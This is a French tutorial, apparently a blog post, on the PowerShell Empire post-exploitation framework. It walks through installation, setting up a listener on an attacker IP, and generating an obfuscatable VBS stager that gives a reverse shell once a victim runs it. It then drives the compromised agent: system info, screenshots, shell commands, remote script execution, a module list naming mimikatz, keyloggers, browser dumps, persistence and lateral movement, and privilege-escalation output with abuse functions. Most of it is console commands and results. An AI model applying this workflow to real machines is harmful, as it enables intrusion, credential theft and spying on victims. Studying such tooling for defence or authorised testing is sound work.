Powershell Empire Hacking

Empire est un framework de post-exploitation pour système Windows & Windows Server. Le principe de fonctionnement ressemble à celui de metasploit mais Empire cible principalement les machines Windows (Il y a quelques payload linux/osx)

L'avantage est d'avoir des attaques avancé sur les services Microsoft, et de lancer les commandes en mémoire et non sur le disque, cela réduit la probabilité d'être détecté par un antivirus ou de laisser des traces.

Que fait Empire

Principalement de l'élévation de privilèges, reconnaissances du réseau, mouvements latéraux entre les hôtes et collecte de donnée.

Comment fonctionne Empire

Empire est composé de 3 composants principaux :

  • Listener : Processus attend une connexion de la machine que nous attaquons
  • Stager : Extrait de code qui permet à notre code malveillant d'être exécuté via l'agent sur l'hôte compromis
  • Agent : programme qui maintient une connexion entre l'hôte compromis et la machine attaquante

Les modules sont ceux qui exécutent les commandes malveillantes qui collectent les informations et font évoluer nos privilèges

Installer Empire

Télécharger le setup

git clone https://github.com/EmpireProject/Empire

Installer Empire

./Empire/setup/install.sh

Utilisation

1- Créer un listener

(Empire) > listeners

(Empire: listeners) > uselistener 
dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector

(Empire: listeners) > uselistener http #Ou laissez la config par défaut 

(Empire: listeners/meterpreter) > set 
Host  Name  Port

(Empire: listeners/meterpreter) > set Host 192.168.1.11
(Empire: listeners/meterpreter) > set Port 80
(Empire: listeners/meterpreter) > set Name L1
(Empire: listeners/meterpreter) > execute
[*] Starting listener 'L1'
[+] Listener successfully started!

Nous avons créé un listener meterpreter nommé L1 qui écoute la connexion sur 192.168.1.11 sur le port 80

Revenez au menu principal avec la commande main

2- Créer le stagers

Utilisé pour préparer la post-exploitation, il est similaire au payload

(Empire) > usestager 
multi/bash                osx/applescript           osx/launcher              osx/teensy                windows/ducky             windows/launcher_vbs      windows/teensy
multi/launcher            osx/application           osx/macho                 windows/backdoorLnkMacro  windows/hta               windows/launcher_xml      
multi/macro               osx/ducky                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro             
multi/pyinstaller         osx/dylib                 osx/pkg                   windows/csharp_exe        windows/launcher_lnk      windows/macroless_msword  
multi/war                 osx/jar                   osx/safari_launcher       windows/dll               windows/launcher_sct      windows/shellcode

(Empire) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > info

Name: VBS Launcher

Description:
  Generates a .vbs launcher for Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  OutFile          False       /tmp/launcher.vbs File to output .vbs launcher to,
                                                 otherwise displayed on the screen.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  ObfuscateCommand False       Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  Language         True        powershell        Language of the stager to generate.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.

(Empire: stager/windows/launcher.bat) > set Listener L1
(Empire: stager/windows/launcher.bat) > set StagerRetries 5
(Empire: stager/windows/launcher_vbs) > execute

[*] Stager output written out to: /tmp/launcher.vbs

Un script vbs sera généré et lié au listener L1

ASTUCE Configurer le StagerRetries

Revenez au menu principal avec la commande main

3- Création de l'agent

Lorsque la cible exécute le stager nous obtiendrons un reverse shell (il faut que la charge soit exécuté par la victime)

Lorsque la connexion est reçu

(Empire: stager/windows/launcher_vbs) > [*] Sending POWERSHELL stager (stage 1) to 192.168.1.29
[*] New agent R2NW97FU checked in
[+] Initial agent R2NW97FU from 192.168.1.29 now active (Slack)
[*] Sending agent (stage 2) to R2NW97FU at 192.168.1.29

En revenant au menu principal, un agent est déclaré.

===============================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       1 listeners currently active

       1 agents currently active


(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 R2NW97FU ps 192.168.1.29    WIN10TEST         WIN10TEST\admin         powershell         4492   5/0.0    2019-06-07 20:05:51

(Empire: agents) > 

Sur le poste victime, on peut constater qu'un process powershell est lancé (le reverse shell est écrit en une ligne powershell encodé en base64)

Pour la phase d'escalade de privilege, de nombreux modules sont disponible (path the hash, mimikatz, injection de dll, ...)

(Empire: agents) > interact
interact
(Empire: agents) > interact R2NW97FU
(Empire: R2NW97FU) > help

Agent Commands
==============
agents            Jump to the agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
download          Task an agent to download a file.
exit              Task agent to exit.
help              Displays the help menu or syntax for particular commands.
info              Display information about this agent
injectshellcode   Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs              Return jobs or kill a running job.
kill              Task an agent to kill a particular process name or ID.
killdate          Get or set an agent's killdate (01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task an agent to change the limit on lost agent detection
main              Go back to the main menu.
mimikatz          Runs Invoke-Mimikatz on the client.
psinject          Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth               Executes PTH for a CredID through Mimikatz.
rename            Rename the agent.
resource          Read and execute a list of Empire commands from a file.
revtoself         Uses credentials/tokens to revert token privileges.
sc                Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd         Execute a function in the currently imported PowerShell script.
scriptimport      Imports a PowerShell script and keeps it in memory in the agent.
searchmodule      Search Empire module names/descriptions.
shell             Task an agent to use a shell command.
shinject          Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>
sleep             Task an agent to 'sleep interval [jitter]'
spawn             Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token       Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo           Task an agent to get system information.
updatecomms       Dynamically update the agent comms to another listener
updateprofile     Update an agent connection profile.
upload            Task an agent to upload a file.
usemodule         Use an Empire PowerShell module.
workinghours      Get or set an agent's working hours (9:00-17:00).

Obtenir les informations du système

(Empire: KFRUAL24) > sysinfo
[*] Tasked KFRUAL24 to run TASK_SYSINFO
[*] Agent KFRUAL24 tasked with task ID 2
(Empire: KFRUAL24) > sysinfo: 0|http://192.168.1.17:80|WIN10TEST|toto|WIN10TEST|192.168.1.29|Microsoft Windows 10 Professionnel|False|powershell|5396|powershell|5
[*] Agent KFRUAL24 returned results.
Listener:         http://192.168.1.17:80
Internal IP:    192.168.1.29
Username:         WIN10TEST\toto
Hostname:       WIN10TEST
OS:               Microsoft Windows 10 Professionnel
High Integrity:   0
Process Name:     powershell
Process ID:       5396
Language:         powershell
Language Version: 5

Obtenir un screenshot de la victime

(Empire: KFRUAL24) > sc
[*] Tasked KFRUAL24 to run TASK_CMD_WAIT_SAVE
[*] Agent KFRUAL24 tasked with task ID 3
[*] Tasked agent KFRUAL24 to run module powershell/collection/screenshot
(Empire: KFRUAL24) > [+] File screenshot/WIN10TEST_2019-06-07_20-29-44.png from KFRUAL24 saved
[*] Agent KFRUAL24 returned results.
Output saved to ./downloads/KFRUAL24/screenshot/WIN10TEST_2019-06-07_20-29-44.png
[*] Valid results returned by 192.168.1.29

Effectuer des commandes shell (Powershell Only)

(Empire: C4W2DU9K) > shell ls

[*] Tasked C4W2DU9K to run TASK_SHELL
[*] Agent C4W2DU9K tasked with task ID 7
(Empire: C4W2DU9K) > [*] Agent C4W2DU9K returned results.
Répertoire: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       15/09/2018     09:33                PerfLogs                                                              
d-r---       27/01/2019     15:03                Program Files                                                         
d-r---       27/01/2019     15:03                Program Files (x86)                                                   
d-----       07/06/2019     00:26                SysinternalsSuite                                                     
d-r---       07/06/2019     23:11                Users                                                                 
d-----       07/06/2019     00:48                Windows                   

Faire exécuter un script / payload à la victime

#Exemple d'un script Calc.ps1 ouvrant une calculatrice calc.exe

(Empire: C4W2DU9K) > scriptimport /tmp/Calc.ps1

[*] Tasked C4W2DU9K to run TASK_SCRIPT_IMPORT
[*] Agent C4W2DU9K tasked with task ID 18
[*] Agent C4W2DU9K returned results.
script successfully saved in memory

(Empire: C4W2DU9K) > scriptcmd Invoke-Function

[*] Tasked C4W2DU9K to run TASK_SCRIPT_COMMAND
[*] Agent C4W2DU9K tasked with task ID 21
(Empire: C4W2DU9K) > [*] Agent C4W2DU9K returned results.
Job started: 4B8TP3
[*] Valid results returned by 192.168.1.29

#Calculatrice ouverte sur la session de michu

Modules empire

Les modules permettent d'augmenter le contrôle de la victime et les privilèges, eux aussi sont nombreux et efficaces

(Empire: KFRUAL24) > usemodule 
Display all 204 possibilities? (y or n)


code_execution/invoke_reflectivepeinjection                          persistence/misc/add_sid_history*
code_execution/invoke_shellcode                                      persistence/misc/debugger*
code_execution/invoke_shellcodemsil                                  persistence/misc/disable_machine_acct_change*
collection/ChromeDump                                                persistence/misc/get_ssps
collection/FoxDump                                                   persistence/misc/install_ssp*
collection/USBKeylogger*                                             persistence/misc/memssp*
collection/WebcamRecorder                                            persistence/misc/skeleton_key*
collection/browser_data                                              persistence/powerbreach/deaduser
collection/clipboard_monitor                                         persistence/powerbreach/eventlog*
collection/prompt                                                    privesc/bypassuac_wscript
collection/screenshot                                                privesc/getsystem*
collection/vaults/add_keepass_config_trigger                         privesc/gpp
collection/vaults/find_keepass_config                                privesc/mcafee_sitelist
collection/vaults/get_keepass_config_trigger                         privesc/ms16-032
collection/vaults/keethief                                           privesc/ms16-135
credentials/mimikatz/extract_tickets                                 recon/find_fruit
credentials/mimikatz/golden_ticket                                   recon/get_sql_server_login_default_pw
credentials/mimikatz/keys*                                           recon/http_login
credentials/mimikatz/logonpasswords*                                 situational_awareness/host/antivirusproduct
exploitation/exploit_eternalblue                                     situational_awareness/network/get_sql_instance_domain
exploitation/exploit_jboss                                           situational_awareness/network/get_sql_server_info
exploitation/exploit_jenkins                                         situational_awareness/network/portscan
lateral_movement/inveigh_relay                                       situational_awareness/network/powerview/find_foreign_group
lateral_movement/invoke_dcom                                         situational_awareness/network/powerview/find_foreign_user
lateral_movement/invoke_executemsbuild                               situational_awareness/network/powerview/find_gpo_computer_admin
lateral_movement/invoke_psexec                                       situational_awareness/network/powerview/find_gpo_location
lateral_movement/invoke_psremoting                                   situational_awareness/network/powerview/find_localadmin_access
lateral_movement/invoke_smbexec                                      situational_awareness/network/powerview/find_managed_security_group
lateral_movement/invoke_sqloscmd                                     situational_awareness/network/powerview/get_cached_rdpconnection
lateral_movement/invoke_sshcommand                                   situational_awareness/network/powerview/get_computer
management/enable_rdp*                                               situational_awareness/network/powerview/get_gpo
management/get_domain_sid                                            situational_awareness/network/powerview/get_group
management/honeyhash*                                                situational_awareness/network/powerview/get_group_member
management/invoke_script                                             situational_awareness/network/powerview/get_localgroup
management/lock                                                      situational_awareness/network/powerview/get_loggedon
management/logoff                                                    situational_awareness/network/powerview/get_object_acl
management/mailraider/disable_security                               situational_awareness/network/powerview/get_ou
management/mailraider/get_emailitems                                 situational_awareness/network/powerview/get_rdp_session
management/mailraider/get_subfolders                                 situational_awareness/network/powerview/get_session
management/mailraider/mail_search                                    situational_awareness/network/powerview/get_site
management/mailraider/search_gal                                     situational_awareness/network/powerview/get_subnet
management/mailraider/send_mail                                      situational_awareness/network/powerview/get_user
management/mailraider/view_email                                     situational_awareness/network/powerview/map_domain_trust
management/psinject                                                  situational_awareness/network/powerview/process_hunter
management/reflective_inject                                         situational_awareness/network/powerview/set_ad_object
management/restart                                                   situational_awareness/network/powerview/share_finder
management/runas                                                     situational_awareness/network/powerview/user_hunter
management/shinject                                                  situational_awareness/network/reverse_dns
management/sid_to_user                                               situational_awareness/network/smbautobrute
management/spawn                                                     situational_awareness/network/smbscanner
management/spawnas                                                   trollsploit/get_schwifty
management/switch_listener                                           trollsploit/message
management/timestomp                                                 trollsploit/process_killer
management/user_to_sid                                               trollsploit/rick_ascii
management/vnc                                                       trollsploit/rick_astley
management/wdigest_downgrade*                                        trollsploit/thunderstruck
management/zipfolder                                                 trollsploit/voicetroll
persistence/elevated/registry*                                       trollsploit/wallpaper
persistence/elevated/schtasks*                                       trollsploit/wlmdr
....

Chercher un type de module (escalade de privilèges en exemple)

searchmodule esc

 powershell/privesc/powerup/find_dllhijack

	Finds generic .DLL hijacking opportunities.


 powershell/privesc/tater

	Tater is a PowerShell implementation of the Hot Potato Windows
	Privilege Escalation exploit from @breenmachine and @foxglovesec.


 powershell/privesc/bypassuac

	Runs a BypassUAC attack to escape from a medium integrity process to a
	high integrity process. This attack was originally discovered by Leo
	Davidson. Empire uses components of MSF's bypassuac injection
	implementation as well as an adapted version of PowerSploit's Invoke--
	Shellcode.ps1 script for backend lifting.

powershell/privesc/powerup/allchecks

	Runs all current checks for Windows privesc vectors.

...

Utiliser un module (module allcheck privilèges escalation en exemple)

(Empire: VRXN91UM) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > execute

[*] Tasked VRXN91UM to run TASK_CMD_JOB
[*] Agent VRXN91UM tasked with task ID 4
[*] Tasked agent VRXN91UM to run module powershell/privesc/powerup/allchecks

[*] Agent VRXN91UM returned results.

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...


ServiceName    : named
Path           : C:\Program Files\ISC BIND 9\bin\named.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=AUTORITE NT\Utilisateurs authentifiés; 
                 Permissions=AppendData/AddSubdirectory}
StartName      : .\named
AbuseFunction  : Write-ServiceBinary -Name 'named' -Path <HijackPath>
CanRestart     : False

ServiceName    : named
Path           : C:\Program Files\ISC BIND 9\bin\named.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=AUTORITE NT\Utilisateurs authentifiés; 
                 Permissions=System.Object[]}
StartName      : .\named
AbuseFunction  : Write-ServiceBinary -Name 'named' -Path <HijackPath>
CanRestart     : False

ServiceName    : PFNet
Path           : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=AUTORITE NT\Utilisateurs authentifiés; 
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'PFNet' -Path <HijackPath>
CanRestart     : False

ServiceName    : PFNet
Path           : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=AUTORITE NT\Utilisateurs authentifiés; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'PFNet' -Path <HijackPath>
CanRestart     : False

[*] Checking service executable and argument permissions...

ServiceName                     : PFNet
Path                            : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
ModifiableFile                  : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : BUILTIN\Utilisateurs
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'PFNet'
CanRestart                      : False

[*] Checking service permissions...

[*] Checking %PATH% for potentially hijackable DLL locations...

ModifiablePath    : C:\Users\michu\AppData\Local\Microsoft\WindowsApps
IdentityReference : LABS\michu
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\michu\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\michu\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Privatefirewall
Path           : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\PFGUI.exe
ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\PFGUI.exe; 
                 IdentityReference=BUILTIN\Utilisateurs; Permissions=System.Object[]}

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

[*] Checking for cached Group Policy Preferences .xml files....

Invoke-AllChecks completed!

Quelques cheat sheet indispensables

Cheatsheet Empire

CheatSheet Powershell

Cheatsheet empire (enigma)

Previous Post